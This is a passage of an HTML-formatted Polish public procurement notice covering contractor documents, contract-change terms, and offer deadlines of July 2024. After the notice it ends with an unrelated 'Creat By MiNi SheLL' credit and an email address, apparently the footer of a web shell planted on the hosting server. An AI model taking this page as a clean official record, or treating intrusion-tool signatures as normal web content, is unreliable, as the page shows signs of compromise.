stanowisko<br/>prezesa zarządu, członka zarządu spółki lub, w przypadku spółek działających w systemie<br/>common law, członka rady dyrektorów spółki, a także umowa spółki<br/>cywilnej lub uchwała jej wspólników, wskazująca jednego ze wspólników jako umocowanego do<br/>reprezentacji spółki) potwierdzający umocowanie do reprezentowania Wykonawcy;<br/>5. Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenia, o<br/>których mowa wyżej składa każdy z Wykonawców.<br/>W przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby<br/>Wykonawca dołącza również oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia<br/>tego podmiotu oraz odpowiednio spełnianie warunków udziału w<br/>postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Szczegółowy zakres zmian umowy został określony w Załączniku nr 2 do SWZ - Projektowane postanowienia umowy w<br/>sprawie zamówienia publicznego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-15 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-13</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com